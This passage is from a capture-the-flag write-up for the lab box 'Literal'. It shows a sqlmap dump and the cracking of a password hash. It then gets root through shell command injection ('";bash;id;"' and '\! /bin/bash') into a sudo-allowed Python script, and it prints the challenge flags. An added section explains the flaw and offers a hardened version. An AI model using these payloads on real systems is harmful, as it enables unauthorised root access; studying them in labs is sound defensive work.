do you want to use common password suffixes? (slow!) [y/N] N
[13:46:49] [INFO] starting dictionary-based cracking (sha512_generic_passwd)
[13:46:49] [INFO] starting 2 processes 
[13:47:11] [WARNING] no clear password(s) found                                                                                                                                             
Database: forumtesting
Table: forum_owner
[1 entry]
+----+---------------------------------+------------+----------------------------------------------------------------------------------------------------------------------------------+----------+
| id | email                           | created    | password                                                                                                                         | username |
+----+---------------------------------+------------+----------------------------------------------------------------------------------------------------------------------------------+----------+
| 1  | carlos@forumtesting.literal.htb | 2022-02-12 | 6705fe62010679f04257358241792b41acba4ea896178a40eb63c743f5317a09faefa2e056486d55e9c05f851b222e6e7c5c1bd22af135157aa9b02201cf4e99 | carlos   |
+----+---------------------------------+------------+----------------------------------------------------------------------------------------------------------------------------------+----------+

[13:47:11] [INFO] table 'forumtesting.forum_owner' dumped to CSV file '/home/kali/.local/share/sqlmap/output/forumtesting.literal.hmv/dump/forumtesting/forum_owner.csv'
[13:47:11] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/forumtesting.literal.hmv'

[*] ending @ 13:47:11 /2025-06-08/

Then crack it. The 128-hex-character value is a raw SHA-512 hash (sqlmap labelled it sha512_generic_passwd); it cracks to:

carlos:forum100889

But that password fails over SSH. The intended reasoning: the second injected site is a forum (forumtesting), and the password forum100889 is the first letters of the service name followed by a number. Apply the same pattern to SSH and the SSH password would be ssh100889. It takes a bit of a leap....


Privilege escalation

Information gathering

carlos@literal:~$ whoami;id
carlos
uid=1000(carlos) gid=1000(carlos) groups=1000(carlos)
carlos@literal:~$ ls -la
total 44
drwxr-xr-x 7 carlos carlos 4096 Apr  8  2023 .
drwxr-xr-x 3 root   root   4096 Jun 15  2022 ..
lrwxrwxrwx 1 root   root      9 Feb 12  2021 .bash_history -> /dev/null
-rw-r--r-- 1 carlos carlos  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 carlos carlos 3771 Feb 25  2020 .bashrc
drwx------ 2 carlos carlos 4096 Jun 21  2022 .cache
drwx------ 3 carlos carlos 4096 Jun 22  2022 .gnupg
drwxrwxr-x 3 carlos carlos 4096 Feb 12  2021 .local
drwxrwxr-x 2 carlos carlos 4096 Jun 21  2022 my_things
-rw-r--r-- 1 carlos carlos  807 Feb 25  2020 .profile
drwx------ 2 carlos carlos 4096 Sep 20  2021 .ssh
-rw-r----- 1 root   carlos   33 Feb 13  2021 user.txt
carlos@literal:~$ cd my_things/
carlos@literal:~/my_things$ ls -la
total 12
drwxrwxr-x 2 carlos carlos 4096 Jun 21  2022 .
drwxr-xr-x 7 carlos carlos 4096 Apr  8  2023 ..
-rw-rw-r-- 1 carlos carlos  226 Jun  8 17:36 detalles.txt
carlos@literal:~/my_things$ cat detalles.txt 
To check one day.

Blog ----:
> Blog colors.
> Validate syntax and coherence.
> Buttom to translate blog to Spanish.
> Check task on both blog and forum.

Forum ---:
> Delete default posts.
> Create custom responses to mails.
carlos@literal:~/my_things$ crontab -l
no crontab for carlos
carlos@literal:~/my_things$ cd ..
carlos@literal:~$ cat user.txt 
6d3c8a6c73cf4f89eea7ae57f6eb9222
carlos@literal:~$ sudo -l
Matching Defaults entries for carlos on literal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User carlos may run the following commands on literal:
    (root) NOPASSWD: /opt/my_things/blog/update_project_status.py *

sudo -l shows that carlos may run /opt/my_things/blog/update_project_status.py as root without a password, with any arguments (the trailing *). The script:

#!/usr/bin/python3

# Learning python3 to update my project status
## (mental note: This is important, so administrator is my safe to avoid upgrading records by mistake) :P

'''
References:
* MySQL commands in Linux: https://www.shellhacks.com/mysql-run-query-bash-script-linux-command-line/
* Shell commands in Python: https://stackabuse.com/executing-shell-commands-with-python/
* Functions: https://www.tutorialspoint.com/python3/python_functions.htm
* Arguments: https://www.knowledgehut.com/blog/programming/sys-argv-python-examples
* Array validation: https://stackoverflow.com/questions/7571635/fastest-way-to-check-if-a-value-exists-in-a-list
* Valid if root is running the script: https://stackoverflow.com/questions/2806897/what-is-the-best-way-for-checking-if-the-user-of-a-script-has-root-like-privileg
'''

import os
import sys
from datetime import date

# Functions ------------------------------------------------.
def execute_query(sql):
    os.system("mysql -u " + db_user + " -D " + db_name + " -e \"" + sql + "\"")

# Query all rows
def query_all():
    sql = "SELECT * FROM projects;"
    execute_query(sql)

# Query row by ID
def query_by_id(arg_project_id):
    sql = "SELECT * FROM projects WHERE proid = " + arg_project_id + ";"
    execute_query(sql)

# Update database
def update_status(enddate, arg_project_id, arg_project_status):
    if enddate != 0:
        sql = f"UPDATE projects SET prodateend = '" + str(enddate) + "', prostatus = '" + arg_project_status + "' WHERE proid = '" + arg_project_id + "';"
    else:
        sql = f"UPDATE projects SET prodateend = '2222-12-12', prostatus = '" + arg_project_status + "' WHERE proid = '" + arg_project_id + "';"

    execute_query(sql)

# Main program
def main():
    # Fast validation
    try:
        arg_project_id = sys.argv[1]
    except:
        arg_project_id = ""

    try:
        arg_project_status = sys.argv[2]
    except:
        arg_project_status = ""

    if arg_project_id and arg_project_status: # To update
        # Avoid update by error
        if os.geteuid() == 0:
            array_status = ["Done", "Doing", "To do"]
            if arg_project_status in array_status:
                print("[+] Before update project (" + arg_project_id + ")\n")
                query_by_id(arg_project_id)

                if arg_project_status == 'Done':
                    update_status(date.today(), arg_project_id, arg_project_status)
                else:
                    update_status(0, arg_project_id, arg_project_status)
            else:
                print("Bro, avoid a fail: Done - Doing - To do")
                exit(1)

            print("\n[+] New status of project (" + arg_project_id + ")\n")
            query_by_id(arg_project_id)
        else:
            print("Ejejeeey, avoid mistakes!")
            exit(1)

    elif arg_project_id:
        query_by_id(arg_project_id)
    else:
        query_all()

# Variables ------------------------------------------------.
db_user = "carlos"
db_name = "blog"

# Main program
main()

Note that execute_query() hands the concatenated string straight to os.system(), i.e. to /bin/sh: the SQL is wrapped in double quotes but nothing in it is escaped, so an argument containing `"` closes the quoted `-e` string and a `;` after it starts a new shell command. The `os.geteuid() == 0` check only guards the update branch; with a single argument the script calls query_by_id() unconditionally, so the injected value reaches the shell with or without sudo. Try closing the quoted string and appending commands:

carlos@literal:~$ /opt/my_things/blog/update_project_status.py
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
| proid | proname                                                      | prodatecreated      | prodateend | prostatus |
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
|     1 | Ascii Art Python - ABCdario with colors                      | 2021-09-20 17:51:59 | 2021-09-20 | Done      |
|     2 | Ascii Art Python - Show logos only with letter A             | 2021-09-20 18:06:22 | 2222-12-12 | To do     |
|     3 | Ascii Art Bash - Show musical stores (WTF)                   | 2021-09-20 18:06:50 | 2222-12-12 | To do     |
|     4 | Forum - Add that people can send me bug reports of projects  | 2023-04-07 17:40:41 | 2023-11-01 | Doing     |
|     5 | Validate syntax errors on blog pages                         | 2021-09-20 18:07:43 | 2222-12-12 | Doing     |
|     6 | Script to extract info from files and upload it to any DB    | 2021-09-20 18:07:58 | 2222-12-12 | Doing     |
|     7 | Forum - Implement forum form                                 | 2023-04-07 17:46:38 | 2023-11-01 | Doing     |
|     8 | Add that people can create their own projects on DB          | 2021-09-20 18:49:52 | 2222-12-12 | To do     |
|     9 | Ascii Art C - Start learning Ascii Art with C                | 2021-09-20 18:50:02 | 2222-12-12 | To do     |
|    10 | Ascii Art Bash - Welcome banner preview in blog home         | 2021-09-20 18:50:08 | 2222-12-12 | To do     |
|    11 | Blog - Create login and register form                        | 2023-04-07 17:40:28 | 2023-08-21 | Done      |
|    12 | Blog - Improve the appearance of the dashboard/projects page | 2021-09-20 18:50:18 | 2222-12-12 | Doing     |
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
carlos@literal:~$ /opt/my_things/blog/update_project_status.py 1
+-------+-----------------------------------------+---------------------+------------+-----------+
| proid | proname                                 | prodatecreated      | prodateend | prostatus |
+-------+-----------------------------------------+---------------------+------------+-----------+
|     1 | Ascii Art Python - ABCdario with colors | 2021-09-20 17:51:59 | 2021-09-20 | Done      |
+-------+-----------------------------------------+---------------------+------------+-----------+
carlos@literal:~$ /opt/my_things/blog/update_project_status.py 12
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
| proid | proname                                                      | prodatecreated      | prodateend | prostatus |
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
|    12 | Blog - Improve the appearance of the dashboard/projects page | 2021-09-20 18:50:18 | 2222-12-12 | Doing     |
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
carlos@literal:~$ /opt/my_things/blog/update_project_status.py '";whoami;id;"'
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
carlos
uid=1000(carlos) gid=1000(carlos) groups=1000(carlos)
sh: 1: ;: not found
carlos@literal:~$ sudo /opt/my_things/blog/update_project_status.py '";whoami;id;"'
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
root
uid=0(root) gid=0(root) groups=0(root)
sh: 1: ;: not found
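
The following is an added example, not code from the original page or from the Literal box: it rebuilds the exact command line that the script's query_by_id() path feeds to os.system(), tokenises it the way /bin/sh does so the injected whoami and id show up as separate commands, and puts next to it a version of the same functionality without the hole. The hardened builders are our own (the names build_safe_query_argv, build_safe_update_argv, validate_project_id and execute_argv are not from the page); they assume the same mysql CLI, `blog` database and `projects` table the original script uses. One point worth noticing: switching from os.system() to a subprocess argument list removes the shell, but on its own it would still let the `\! /bin/bash` payload shown later on this page through, because `\!` is the mysql client's own `system` command and is interpreted by the client, not by the shell. Whitelisting the project id as a plain integer, and the status against the same three values the script already checks, closes both vectors.

```python
#!/usr/bin/python3
"""Added example (not the script from the box): why the sudo rule is
exploitable and how the same functionality looks without the injection.

Assumptions (not from the original page): the mysql CLI, the 'blog'
database and the 'projects' table exist as in the original script; all
function names below are our own.
"""
import re
import shlex
import subprocess
from datetime import date

DB_USER = "carlos"
DB_NAME = "blog"
ALLOWED_STATUS = ("Done", "Doing", "To do")


def build_vulnerable_command(arg_project_id: str) -> str:
    """Reproduces exactly what query_by_id() -> execute_query() hand to
    os.system(): the argument is spliced into the SQL, and the SQL into a
    double-quoted shell string, with no escaping at either layer."""
    sql = "SELECT * FROM projects WHERE proid = " + arg_project_id + ";"
    return "mysql -u " + DB_USER + " -D " + DB_NAME + " -e \"" + sql + "\""


def shell_tokens(command: str) -> list:
    """Tokenise a command line the way /bin/sh would: quotes honoured and ';'
    returned as its own token, so we can see what os.system() really runs."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def validate_project_id(arg_project_id: str) -> int:
    """Accept only an unsigned integer. This rejects the shell payload
    '";whoami;id;"' and also the mysql-client payload '\\! /bin/bash'."""
    if not re.fullmatch(r"[0-9]{1,9}", arg_project_id):
        raise ValueError("project id must be a positive integer")
    return int(arg_project_id)


def build_safe_query_argv(arg_project_id: str) -> list:
    """argv for the read-only path; the id is an int, so it cannot carry
    quotes, ';' or a client command."""
    pid = validate_project_id(arg_project_id)
    return ["mysql", "-u", DB_USER, "-D", DB_NAME, "-e",
            f"SELECT * FROM projects WHERE proid = {pid};"]


def build_safe_update_argv(arg_project_id: str, arg_project_status: str,
                           today: str = None) -> list:
    """argv for the update path. 'today' is an optional ISO date override
    (useful for deterministic tests); otherwise date.today() is used."""
    pid = validate_project_id(arg_project_id)
    if arg_project_status not in ALLOWED_STATUS:  # same allow-list as the script
        raise ValueError("status must be one of " + ", ".join(ALLOWED_STATUS))
    if arg_project_status == "Done":
        end = today or date.today().isoformat()
    else:
        end = "2222-12-12"
    sql = (f"UPDATE projects SET prodateend = '{end}', "
           f"prostatus = '{arg_project_status}' WHERE proid = {pid};")
    return ["mysql", "-u", DB_USER, "-D", DB_NAME, "-e", sql]


def execute_argv(argv: list) -> int:
    """Run the mysql client from an argument vector, never via a shell, so
    quotes and ';' in any element reach mysql as data. Returns the exit code."""
    return subprocess.run(argv, check=False).returncode


if __name__ == "__main__":
    import sys
    payload = '";whoami;id;"'          # the payload used on this page
    print(shell_tokens(build_vulnerable_command(payload)))
    print(build_safe_query_argv(sys.argv[1] if len(sys.argv) > 1 else "12"))
```

Run it without arguments to see the token list for the page's payload (the -e argument is cut off at the first `"`, then `whoami` and `id` follow as their own commands, and the last token is the lone `;` that produced `sh: 1: ;: not found`), or with an id to see the argv that would go to subprocess.run(). execute_argv() is the only function that actually touches mysql.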

mysql itself only receives `SELECT * FROM projects WHERE proid = ` (hence the 1064 syntax error); the shell then runs whoami and id, and the trailing `";"` is left over as a command literally named `;`, which is the `sh: 1: ;: not found` line. Without sudo the commands run as carlos; under the NOPASSWD rule they run as root. Swapping whoami for bash gives a root shell!

image-20250609015839187

carlos@literal:~$ sudo /opt/my_things/blog/update_project_status.py '";bash;id;"'
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
root@literal:/home/carlos# cd ~
root@literal:~# ls -la
total 36
drwx------  5 root root 4096 Jun  8 15:20 .
drwxr-xr-x 20 root root 4096 Feb  7  2021 ..
lrwxrwxrwx  1 root root    9 Feb 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwxr-xr-x  3 root root 4096 Sep 18  2021 .cache
drwxr-xr-x  3 root root 4096 Feb 12  2021 .local
drwxr-xr-x  3 root root 4096 Jun 17  2022 my_things
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-------  1 root root   33 Feb 13  2021 root.txt
-rw-r--r--  1 root root   74 Sep 20  2021 .selected_editor
root@literal:~# cat root.txt
ca43cb966ef76475d9e0736feeb9f730

I also saw another solution:

sudo /opt/my_things/blog/update_project_status.py '\! /bin/bash' Done

That's nice too!!!

This article is licensed by the author under CC BY 4.0.